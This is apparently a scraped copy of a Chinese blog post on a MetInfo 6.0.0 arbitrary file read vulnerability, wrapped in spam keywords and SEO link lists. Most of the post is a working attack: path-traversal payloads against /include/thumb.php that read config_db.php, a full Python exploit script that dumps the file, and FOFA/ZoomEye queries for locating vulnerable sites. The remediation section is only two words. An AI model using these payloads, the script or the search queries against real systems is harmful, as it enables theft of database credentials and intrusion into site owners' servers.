中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

杭州營(yíng)銷(xiāo)型網(wǎng)站建設(shè)排名廣告接單平臺(tái)app

杭州營(yíng)銷(xiāo)型網(wǎng)站建設(shè)排名,廣告接單平臺(tái)app,vs做網(wǎng)站不顯示圖片,手機(jī)郵箱申請(qǐng)免費(fèi)注冊(cè)感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 文章目錄 1.1、漏洞描述1.2、漏洞等級(jí)1.3、影響版本1.4、漏洞復(fù)現(xiàn)代碼審計(jì)漏洞點(diǎn) 1.5、深度利用EXP編寫(xiě) 1.6、漏洞挖掘1.7修復(fù)建議 1.1、漏洞描述 漏洞名稱(chēng):MetInfo任意文件…

感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī)

文章目錄

      • 1.1、漏洞描述
      • 1.2、漏洞等級(jí)
      • 1.3、影響版本
      • 1.4、漏洞復(fù)現(xiàn)
        • 代碼審計(jì)
        • 漏洞點(diǎn)
      • 1.5、深度利用
        • EXP編寫(xiě)
      • 1.6、漏洞挖掘
      • 1.7修復(fù)建議

1.1、漏洞描述

漏洞名稱(chēng):MetInfo任意文件讀取

漏洞簡(jiǎn)介:MetInfo是一套使用PHP和MySQL開(kāi)發(fā)的內(nèi)容管理系統(tǒng),其中的/app/system/include/module/old_thumb.class.php文件存在任意文件讀取漏洞,攻擊者可利用該漏洞讀取網(wǎng)站的敏感文件。

下載地址:歷史版本安裝文件下載 Ver_6.0.0

1.2、漏洞等級(jí)

高危

1.3、影響版本

在這里插入圖片描述

影響版本:MetInfo 6.0.0

1.4、漏洞復(fù)現(xiàn)

代碼審計(jì)
defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir變量接受來(lái)自$_GET[‘dir’]傳遞進(jìn)來(lái)的值,用了str_replace函數(shù)做替換,將.././替換成空值

readfile($dir);

漏洞點(diǎn)
/include/thumb.php

使用bp進(jìn)行抓包

在這里插入圖片描述

測(cè)試一:

/include/thumb.php?dir=..././http/..././config/config_db.php

測(cè)試二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

測(cè)試三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

測(cè)試四:

/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 僅適用于Windows 系統(tǒng),Linux 下無(wú)效  
#    只有windows以右斜杠作為文件路徑分隔符

在這里插入圖片描述

1.5、深度利用

EXP編寫(xiě)
import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__           __________                   .___\_   _____/|__|  |   ____   \______   \ ____ _____     __| _/|    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | \/                 \/          \/     \/     \/      \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir":  param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)

在這里插入圖片描述

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修復(fù)建議

  • 升級(jí)
  • 打補(bǔ)丁
http://www.risenshineclean.com/news/49803.html

相關(guān)文章:

  • 哪個(gè)網(wǎng)站做衣服的線上營(yíng)銷(xiāo)策略
  • 重慶建網(wǎng)站推廣價(jià)格創(chuàng)建一個(gè)網(wǎng)站
  • 運(yùn)營(yíng)網(wǎng)站長(zhǎng)沙seo技術(shù)培訓(xùn)
  • 網(wǎng)站建設(shè)優(yōu)惠中ui培訓(xùn)
  • 國(guó)內(nèi)做網(wǎng)站建設(shè)知名的公司怎么優(yōu)化標(biāo)題和關(guān)鍵詞排名
  • 大連做網(wǎng)站billionseo下載愛(ài)城市網(wǎng)app官方網(wǎng)站
  • 昆明二級(jí)站seo整站優(yōu)化排名上海最新新聞
  • 汽修網(wǎng)站建設(shè)免費(fèi)推廣營(yíng)銷(xiāo)平臺(tái)
  • 做自媒體發(fā)視頻用哪些網(wǎng)站百度域名查詢(xún)官網(wǎng)
  • 一些做系統(tǒng)的網(wǎng)站網(wǎng)絡(luò)服務(wù)器的功能
  • 點(diǎn)開(kāi)圖片跳到網(wǎng)站怎么做網(wǎng)絡(luò)營(yíng)銷(xiāo)最火的案例
  • 建網(wǎng)站添加付款方式中國(guó)軟文網(wǎng)官網(wǎng)
  • 電商網(wǎng)站產(chǎn)品設(shè)計(jì)優(yōu)化技術(shù)主要是上海專(zhuān)業(yè)seo服務(wù)公司
  • 衢州站電話重慶疫情最新情況
  • 石巖網(wǎng)站建設(shè) 0755seo網(wǎng)絡(luò)排名優(yōu)化
  • 公司網(wǎng)站建設(shè)企劃書(shū)app推廣員怎么做
  • 建網(wǎng)站 網(wǎng)站內(nèi)容怎么做地推
  • 杭州pc網(wǎng)站建設(shè)方案蚌埠seo外包
  • 1個(gè)空間做兩個(gè)網(wǎng)站百度網(wǎng)盤(pán)app下載安裝官方免費(fèi)版
  • 的推網(wǎng)站模板百度帳號(hào)申請(qǐng)注冊(cè)
  • 外貿(mào)商城網(wǎng)站網(wǎng)站建設(shè)合同模板
  • 龍門(mén)惠州網(wǎng)站建設(shè)如何申請(qǐng)一個(gè)網(wǎng)站域名
  • 網(wǎng)站建設(shè)實(shí)錄活動(dòng)推廣宣傳方案
  • 英文營(yíng)銷(xiāo)網(wǎng)站 知乎seo長(zhǎng)尾關(guān)鍵詞排名
  • 電子商務(wù)網(wǎng)站建設(shè)實(shí)用教程教案黃頁(yè)88推廣多少錢(qián)一年
  • php 網(wǎng)站建設(shè)方案內(nèi)容營(yíng)銷(xiāo)案例
  • 幫別人起名 做ppt的網(wǎng)站做百度推廣怎么做才能有電話
  • 網(wǎng)站版面在線設(shè)計(jì)愛(ài)站權(quán)重查詢(xún)
  • 網(wǎng)站建設(shè)的功能都需要有哪些方面網(wǎng)圖識(shí)別在線百度
  • 客戶做網(wǎng)站一定報(bào)價(jià)怎么辦網(wǎng)站推廣的方式有